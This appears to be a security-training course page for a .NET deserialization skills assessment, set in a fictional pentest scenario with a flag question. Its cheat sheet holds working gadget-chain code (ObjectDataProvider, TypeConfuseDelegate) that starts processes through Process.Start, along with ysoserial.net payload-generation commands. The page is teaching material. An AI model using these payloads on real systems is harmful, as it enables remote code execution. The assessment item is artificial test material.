Advanced Deserialization Attacks

Skills Assessment

Cerealizer, a company specializing in producing custom cereals, has contracted you to conduct a penetration test on their web application, focusing on deserialization vulnerabilities.

As it is a whitebox penetration test, they have provided the deployment files for the application (refer to the attached zip file below).

Their website may be accessed at http://SERVER-IP:8000:

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

+ 50 Identify the deserialization vulnerability in the website, and exploit it to achieve remote code execution. Submit the contents of 'C:\Users\Public\flag.txt' as the answer.

+10 Streak pts

Cerealizer.Publish.zip

Go to Questions

Introduction

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Identifying Deserialization Vulnerabilities

White-Box

Serializer	Example	Reference
BinaryFormatter	`.Deserialize(...)`	Microsoft
fastJSON	`JSON.ToObject(...)`	GitHub
JavaScriptSerializer	`.Deserialize(...)`	Microsoft
Json.NET	`JsonConvert.DeserializeObject(...)`	Newtonsoft
LosFormatter	`.Deserialize(...)`	Microsoft
NetDataContractSerializer	`.ReadObject(...)`	Microsoft
ObjectStateFormatter	`.Deserialize(...)`	Microsoft
SoapFormatter	`.Deserialize(...)`	Microsoft
XmlSerializer	`.Deserialize(...)`	Microsoft
YamlDotNet	`.Deserialize<...>(...)`	GitHub

Black-Box

For .NET Applications we can keep an eye out for the following:

Base64-encoded strings beginning with AAEAAAD/////
Strings containing $type
Strings containg __type
Strings containg TypeObject

Regarding Java Applications, the following cases are interesting:

Bytes containing AC ED 00 05
Base64-encoded string containg rO0

Exploiting Deserialization Vulnerabilities

ObjectDataProvider

using System.Windows.Data;

namespace ODPExample
{
    internal class Program
    {
        static void Main(string[] args)
        {
            ObjectDataProvider odp = new ObjectDataProvider();
            odp.ObjectType = typeof(System.Diagnostics.Process);
            odp.MethodParameters.Add("C:\\Windows\\System32\\cmd.exe");
            odp.MethodParameters.Add("/c calc.exe");
            odp.MethodName = "Start";
        }
    }
}

TypeConfuseDelegate

Delegate stringCompare = new Comparison<string>(string.Compare);
Comparison<string> multicastDelegate = (Comparison<string>) MulticastDelegate.Combine(stringCompare, stringCompare);
IComparer<string> comparisonComparer = Comparer<string>.Create(multicastDelegate);

FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = multicastDelegate.GetInvocationList();
invoke_list[1] = new Func<string, string, Process>(Process.Start);
fi.SetValue(multicastDelegate, invoke_list);

SortedSet<string> sortedSet = new SortedSet<string>(comparisonComparer);
sortedSet.Add("/c calc");
sortedSet.Add("C:\\Windows\\System32\\cmd.exe");

YSoSerial.NET

-f to specify the Formatter, e.g. Json.NET, XmlSerializer, BinaryFormatter
-g to specify the Gadget, e.g. ObjectDataProvider, TypeConfuseDelegate
-c to specify the Command, e.g. calc
-o to specify the Output mode, e.g. Base64 or Raw for plaintext

.\ysoserial.exe -f [Formatter] -g [Gadget] -c [Command] -o [Output]

E.g.:
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "notepad" -o Raw
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "notepad" -o Raw
.\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'notepad' -o base64

Defending against Deserialization Vulnerabilities

Avoid Deserializing User Input
Avoid Unecessary Deserialization
Use Secure Serialization Mechanisms
Use Explicit Types
Use Signed Data
Least Possible Privileges

Advanced Deserialization Attacks

Skills Assessment

Questions

Table of Contents

Introduction

Identifying Deserialization Vulnerabilities

Exploiting Deserialization Vulnerabilities

Defending against Deserialization Vulnerabilities

Skills Assessment

My Workstation